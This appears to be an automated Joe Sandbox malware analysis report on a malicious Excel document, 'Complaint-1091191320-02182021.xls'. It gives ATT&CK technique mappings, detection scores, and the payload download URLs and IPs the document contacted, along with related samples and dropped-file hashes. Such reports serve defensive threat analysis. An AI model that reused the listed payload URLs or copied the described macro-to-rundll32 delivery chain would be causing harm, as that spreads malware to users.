Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol4Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer5Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Complaint-1091191320-02182021.xls16%MetadefenderBrowse
Complaint-1091191320-02182021.xls38%ReversingLabsDocument-Excel.Trojan.AShadow

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://chandni.pk/cgi-sys/suspendedpage.cgi100%Avira URL Cloudmalware
http://batikentklinik.com/qtuofsxtov/44249951829861100000.dat100%Avira URL Cloudmalware
http://7ruzezendegi.com/samsgtlfwzt/44249951829861100000.dat100%Avira URL Cloudmalware
http://chandni.pk/ictrljsfuh/44249951829861100000.dat0%Avira URL Cloudsafe
http://dindorf.com.ar/ntpnttfypqs/44249951829861100000.dat0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://7ruzezendegi.com/cgi-sys/suspendedpage.cgi100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
dindorf.com.ar
181.88.192.136
truefalse
    unknown
    batikentklinik.com
    2.59.117.215
    truefalse
      unknown
      chandni.pk
      192.185.16.95
      truefalse
        unknown
        miaovideo.com
        112.125.131.128
        truefalse
          unknown
          7ruzezendegi.com
          185.159.153.72
          truefalse
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://chandni.pk/cgi-sys/suspendedpage.cgitrue
            • Avira URL Cloud: malware
            unknown
            http://batikentklinik.com/qtuofsxtov/44249951829861100000.dattrue
            • Avira URL Cloud: malware
            unknown
            http://7ruzezendegi.com/samsgtlfwzt/44249951829861100000.dattrue
            • Avira URL Cloud: malware
            unknown
            http://chandni.pk/ictrljsfuh/44249951829861100000.datfalse
            • Avira URL Cloud: safe
            unknown
            http://dindorf.com.ar/ntpnttfypqs/44249951829861100000.datfalse
            • Avira URL Cloud: safe
            unknown
            http://7ruzezendegi.com/cgi-sys/suspendedpage.cgitrue
            • Avira URL Cloud: malware
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000004.00000002.2171015522.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164266296.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2156318745.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152670940.0000000001C87000.00000002.00000001.sdmpfalse
              high
              http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpfalse
                high
                http://investor.msn.comrundll32.exe, 00000004.00000002.2170893256.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164131332.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2155760549.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152472144.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpfalse
                  high
                  http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000004.00000002.2170893256.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164131332.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2155760549.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152472144.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpfalse
                    high
                    http://www.icra.org/vocabulary/.rundll32.exe, 00000004.00000002.2171015522.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164266296.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2156318745.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152670940.0000000001C87000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://investor.msn.com/rundll32.exe, 00000004.00000002.2170893256.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164131332.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2155760549.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152472144.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpfalse
                      high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000004.00000002.2171015522.0000000001CD7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164266296.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2156318745.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152670940.0000000001C87000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.hotmail.com/oerundll32.exe, 00000004.00000002.2170893256.0000000001AF0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2164131332.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2155760549.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2152472144.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2146230091.0000000001C50000.00000002.00000001.sdmpfalse
                        high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        185.159.153.72
                        unknownIran (ISLAMIC Republic Of)
                        201999SERVERPARSIRfalse
                        181.88.192.136
                        unknownArgentina
                        7303TelecomArgentinaSAARfalse
                        112.125.131.128
                        unknownChina
                        37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                        2.59.117.215
                        unknownTurkey
                        42926RADORETRfalse
                        192.185.16.95
                        unknownUnited States
                        46606UNIFIEDLAYER-AS-1USfalse

                        General Information

                        Joe Sandbox Version:31.0.0 Emerald
                        Analysis ID:356327
                        Start date:22.02.2021
                        Start time:22:49:56
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 45s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:Complaint-1091191320-02182021.xls
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal88.expl.evad.winXLS@11/9@5/5
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xls
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Found warning dialog
                        • Click Ok
                        • Found warning dialog
                        • Click Ok
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356327/sample/Complaint-1091191320-02182021.xls

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        185.159.153.72Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                        • 7ruzezendegi.com/samsgtlfwzt/44246552209027800000.dat
                        Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                        • 7ruzezendegi.com/samsgtlfwzt/44246549891435200000.dat
                        Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                        • 7ruzezendegi.com/samsgtlfwzt/44246547662963000000.dat
                        Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                        • 7ruzezendegi.com/samsgtlfwzt/44246544175463000000.dat
                        181.88.192.136Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                        • dindorf.com.ar/ntpnttfypqs/44246552209027800000.dat
                        Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                        • dindorf.com.ar/ntpnttfypqs/44246549891435200000.dat
                        Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                        • dindorf.com.ar/ntpnttfypqs/44246547662963000000.dat
                        Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                        • dindorf.com.ar/ntpnttfypqs/44246544175463000000.dat
                        112.125.131.128Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                          Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                            Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                2.59.117.215Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • batikentklinik.com/qtuofsxtov/44246547662963000000.dat
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • batikentklinik.com/qtuofsxtov/44246544175463000000.dat
                                192.185.16.95Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • chandni.pk/ictrljsfuh/44246547662963000000.dat
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • chandni.pk/ictrljsfuh/44246544175463000000.dat
                                Claim-292671392-02082021.xlsGet hashmaliciousBrowse
                                • amateen.slashinnovate.com/akmhlngpwxi/785565.jpg
                                Claim-292671392-02082021.xlsGet hashmaliciousBrowse
                                • amateen.slashinnovate.com/akmhlngpwxi/785565.jpg
                                Claim-688493464-02082021.xlsGet hashmaliciousBrowse
                                • amateen.slashinnovate.com/akmhlngpwxi/785565.jpg
                                Claim-688493464-02082021.xlsGet hashmaliciousBrowse
                                • amateen.slashinnovate.com/akmhlngpwxi/785565.jpg

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                chandni.pkComplaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 192.185.16.95
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 192.185.16.95
                                batikentklinik.comComplaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 2.59.117.215
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 2.59.117.215
                                dindorf.com.arComplaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 181.88.192.136
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 181.88.192.136
                                Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 181.88.192.136
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 181.88.192.136
                                miaovideo.comComplaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 112.125.131.128
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 112.125.131.128
                                Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 112.125.131.128
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 112.125.131.128
                                7ruzezendegi.comComplaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 185.159.153.72
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 185.159.153.72
                                Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 185.159.153.72
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 185.159.153.72

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdComplaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 112.125.131.128
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 112.125.131.128
                                Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 112.125.131.128
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 112.125.131.128
                                vodafone bill.xlsmGet hashmaliciousBrowse
                                • 106.15.177.228
                                12592516.exeGet hashmaliciousBrowse
                                • 60.205.177.239
                                Vodafone Bill.xlsmGet hashmaliciousBrowse
                                • 106.15.177.228
                                Vodafone Bill.xlsmGet hashmaliciousBrowse
                                • 106.15.177.228
                                vodafone bill.xlsmGet hashmaliciousBrowse
                                • 106.15.177.228
                                Vodafone Bill.xlsmGet hashmaliciousBrowse
                                • 106.15.177.228
                                vodafone bill.xlsmGet hashmaliciousBrowse
                                • 106.15.177.228
                                vodafone bill.xlsmGet hashmaliciousBrowse
                                • 106.15.177.228
                                DocuSign_1836114226_1054348953.xlsGet hashmaliciousBrowse
                                • 8.170.20.72
                                Quotation.exeGet hashmaliciousBrowse
                                • 39.106.80.157
                                DocuSign_522706162_899818361.xlsGet hashmaliciousBrowse
                                • 8.170.20.72
                                DocuSign_77779925_593019506.xlsGet hashmaliciousBrowse
                                • 8.170.20.72
                                Vodafone bill.xlsmGet hashmaliciousBrowse
                                • 106.15.177.228
                                Vodafone bill.xlsmGet hashmaliciousBrowse
                                • 106.15.177.228
                                Vodafone bill.xlsmGet hashmaliciousBrowse
                                • 106.15.177.228
                                DocuSign_198836422_1059763935.xlsGet hashmaliciousBrowse
                                • 8.170.20.72
                                SERVERPARSIRComplaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 185.159.153.72
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 185.159.153.72
                                Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 185.159.153.72
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 185.159.153.72
                                RFQ ID 574853.exeGet hashmaliciousBrowse
                                • 185.159.153.117
                                Order484894.exeGet hashmaliciousBrowse
                                • 185.159.153.117
                                Payment copy details.xlsmGet hashmaliciousBrowse
                                • 185.55.225.19
                                Payment copy details.xlsmGet hashmaliciousBrowse
                                • 185.55.225.19
                                New Iquiry.xlsmGet hashmaliciousBrowse
                                • 185.55.225.19
                                SecuriteInfo.com.Generic.mg.d4f8d10203aece68.exeGet hashmaliciousBrowse
                                • 185.55.225.19
                                TJLhqM8b2O.exeGet hashmaliciousBrowse
                                • 185.55.225.19
                                https://eya.ir/.dhl2020/dhl/source/index.php?email=sav@idcom-frGet hashmaliciousBrowse
                                • 185.55.227.78
                                DOC_18_092020_4_41133.docGet hashmaliciousBrowse
                                • 185.55.225.33
                                Ucpovt5Tm3FncOG.exeGet hashmaliciousBrowse
                                • 185.159.153.69
                                rKdhHVWehasFrcb.exeGet hashmaliciousBrowse
                                • 185.159.153.69
                                4PGVV5ztI9OHQsS.exeGet hashmaliciousBrowse
                                • 185.159.153.69
                                8JVksjPpTQe3cej.exeGet hashmaliciousBrowse
                                • 185.159.153.69
                                PLoLHKhSjefximh.exeGet hashmaliciousBrowse
                                • 185.159.153.69
                                LmmDm1gMY4XV2Ti.exeGet hashmaliciousBrowse
                                • 185.159.153.69
                                KsoUkx8kQkhNBfv.exeGet hashmaliciousBrowse
                                • 185.159.153.69
                                TelecomArgentinaSAARSecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                • 186.137.85.76
                                Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 181.88.192.136
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 181.88.192.136
                                Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                • 181.88.192.136
                                Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                • 181.88.192.136
                                SecuriteInfo.com.Heur.28366.xlsGet hashmaliciousBrowse
                                • 186.137.85.76
                                Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                                • 186.137.85.76
                                IU-8549 Medical report COVID-19.docGet hashmaliciousBrowse
                                • 181.171.209.241
                                carirstlite.exeGet hashmaliciousBrowse
                                • 200.127.121.99
                                Io8ic2291n.docGet hashmaliciousBrowse
                                • 152.169.22.67
                                wEcncyxrEeGet hashmaliciousBrowse
                                • 181.95.96.141
                                INFO_2020.docGet hashmaliciousBrowse
                                • 190.247.139.101
                                WUHU95Apq3Get hashmaliciousBrowse
                                • 181.92.104.178
                                creoagent.dllGet hashmaliciousBrowse
                                • 201.212.10.205
                                creoagent.dllGet hashmaliciousBrowse
                                • 201.212.10.205
                                file.docGet hashmaliciousBrowse
                                • 181.10.46.92
                                453690-3012-QZS-9120501.docGet hashmaliciousBrowse
                                • 190.247.139.101
                                file-2021-7_86628.docGet hashmaliciousBrowse
                                • 181.10.46.92
                                Messaggio 2001 2021 3-4543.docGet hashmaliciousBrowse
                                • 181.10.46.92
                                Info_C_780929.docGet hashmaliciousBrowse
                                • 152.170.79.100

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\suspendedpage[1].htm
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:HTML document, ASCII text
                                Category:downloaded
                                Size (bytes):494
                                Entropy (8bit):4.962239405540505
                                Encrypted:false
                                SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                MD5:0357AA49EA850B11B99D09A2479C321B
                                SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                IE Cache URL:http://chandni.pk/cgi-sys/suspendedpage.cgi
                                Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\suspendedpage[1].htm
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:HTML document, UTF-8 Unicode text, with CRLF line terminators
                                Category:downloaded
                                Size (bytes):678
                                Entropy (8bit):5.285274611226955
                                Encrypted:false
                                SSDEEP:12:qTWgr2dzLtGc8NZAPvzLUIp1Y2vWMA78h2vu9ZQhUytSAzYNPvK6wcYKpGu:0Wxdz8LkHzA2Y2vW+h2vunQr1CK6Tz
                                MD5:1C7833DA48979334A611F80C7C55F5E6
                                SHA1:B302B4245452489C6241CE4358BD1F07BA4A6767
                                SHA-256:D0D92045526C516AFEC269826EB681EF55DF6353DD9D131BC58A1B19042B7C6C
                                SHA-512:512D0ED4A7BD2BA867C96AF87F114B343FD821A3C826B7F04272AFE40CE218294E893D49167932248DD9297A423B2DC354F07659F979416433DB7F62AF6B0C5C
                                Malicious:false
                                Reputation:low
                                IE Cache URL:http://7ruzezendegi.com/cgi-sys/suspendedpage.cgi
                                Preview: <!doctype html>..<html>..<head>..<meta charset="utf-8">..<title>Suspend !</title>..<link href="http://suspend.pars.host/css/css.css" rel="stylesheet" type="text/css">..</head>....<body>..<div class="main">..<center><a style="" href="http://pars.host"><img src="http://suspend.pars.host/image/logo.png" /></a></center>..<p align="center">..... ..... .. ...... ..... ... ...<br>........ .... ...... ... ..... ..... . .... .... ... .......<br>....... .. .... <a style="" href="http://pars.host">.... ....</a> .... .... .........<br><br>..</div>....</p>..</body>..</html>..
                                C:\Users\user\AppData\Local\Temp\FCCE0000
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):31998
                                Entropy (8bit):7.652541063829903
                                Encrypted:false
                                SSDEEP:768:TkBP+/ixqfouhNUuOW+u7qSL6ACmUI/V5b:TQW/PNNffL6AJb
                                MD5:388FDB6DBC8F0E957210B03C2AAE2DBB
                                SHA1:C1F09C9A249EA2013FE21A51EE405BC3A066AA44
                                SHA-256:7888D0251786B53BF322BD48C87C3BD5B1F9A08A3241EE35080F605D3F4E3DA8
                                SHA-512:F9C5EF236A5367A7BC47E73242F9BF29761AAB01E5166D51752C17119AF3DE09B700A5865F591832305B081550B6F07FB094E9D14B44DA044DC6E6354AF649AE
                                Malicious:false
                                Reputation:low
                                Preview: .U.n.0....?......(..r.Mrl.$...\K....I..v..pl).E.R.3;+.N.V.TO.Q{..f.*p.+..y......pJ..ek@v5..i.........O)...e.V`..8.Y.hE.... .Rt./'.o\z...:..l6...x4..Y..FIp..~n..T-.6..:?..k...!.-E....S{.j.Xh...GKb...... Y..Ic.....|.3..q.[..B.a.._.w...[.^g.....F....1.....+.}\._6.dk,..`...c.........(<.T....b....x5r&%...E.X!......\..w<M....\.7..9.........m..b.E.u...u.]...'t.(....}8..m...C~..E.....?..Z.]..i.D.O..B3....b.k..Z....x.A.yJ)P..y...........PK..........!........V.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint-1091191320-02182021.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue Feb 23 05:50:37 2021, atime=Tue Feb 23 05:50:37 2021, length=58880, window=hide
                                Category:dropped
                                Size (bytes):2218
                                Entropy (8bit):4.4836046846866635
                                Encrypted:false
                                SSDEEP:48:8alA/XT0jFchot5r1qQh2alA/XT0jFchot5r1qQ/:8a2/XojFcqrAQh2a2/XojFcqrAQ/
                                MD5:62CF141B448287A74929D0B1A63FA391
                                SHA1:831C844577F85F6F721039A905E3CD9F241067E5
                                SHA-256:48A551FBEACEE3B193EDDD3AC3E81898E19F7325E341305A409657410593FAF0
                                SHA-512:E88D3167FF6D0BA8D65C8EAC0B18B5586CABCDAECF81D5E68104E878816F049789906D9EAFC242F87867973C53EB641FFE22D4822979FD7ED17CB4D8EA77631E
                                Malicious:false
                                Reputation:low
                                Preview: L..................F.... ...y.j..{....k1....y.t1.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..>..WRQ6 .COMPLA~1.XLS..p.......Q.y.Q.y*...8.....................C.o.m.p.l.a.i.n.t.-.1.0.9.1.1.9.1.3.2.0.-.0.2.1.8.2.0.2.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\128757\Users.user\Desktop\Complaint-1091191320-02182021.xls.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t.-.1.0.9.1.1.9.1.3.2.0.-.0.2.1.8.2.0.2.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 05:50:37 2021, atime=Tue Feb 23 05:50:37 2021, length=8192, window=hide
                                Category:dropped
                                Size (bytes):867
                                Entropy (8bit):4.463339626509903
                                Encrypted:false
                                SSDEEP:12:85Q8UppEcLgXg/XAlCPCHaXtB8XzB/ZGkJUX+WnicvbdbDtZ3YilMMEpxRljKy1x:85ol/XTd6j/UYeNDv3qr1qrNru/
                                MD5:8EA56090A4A49E5E89DC5A28A89EE2EE
                                SHA1:C6E68A2B86CD7878D0B24D9BA5F85D42987B6DF2
                                SHA-256:128B08591C1CE3C95C6231CF541AC13F84E65DAE065C56A17BFA002A24A54FF8
                                SHA-512:6D62A337F46BB9377682EB6A5DE721B210B7248D6CF7B1B44EC26CE4FCBAB9B6F68F27EF298CBDB208C904C2AE08DA6F4579ED45EBC67DBDD1C08EBEF16908FD
                                Malicious:false
                                Reputation:low
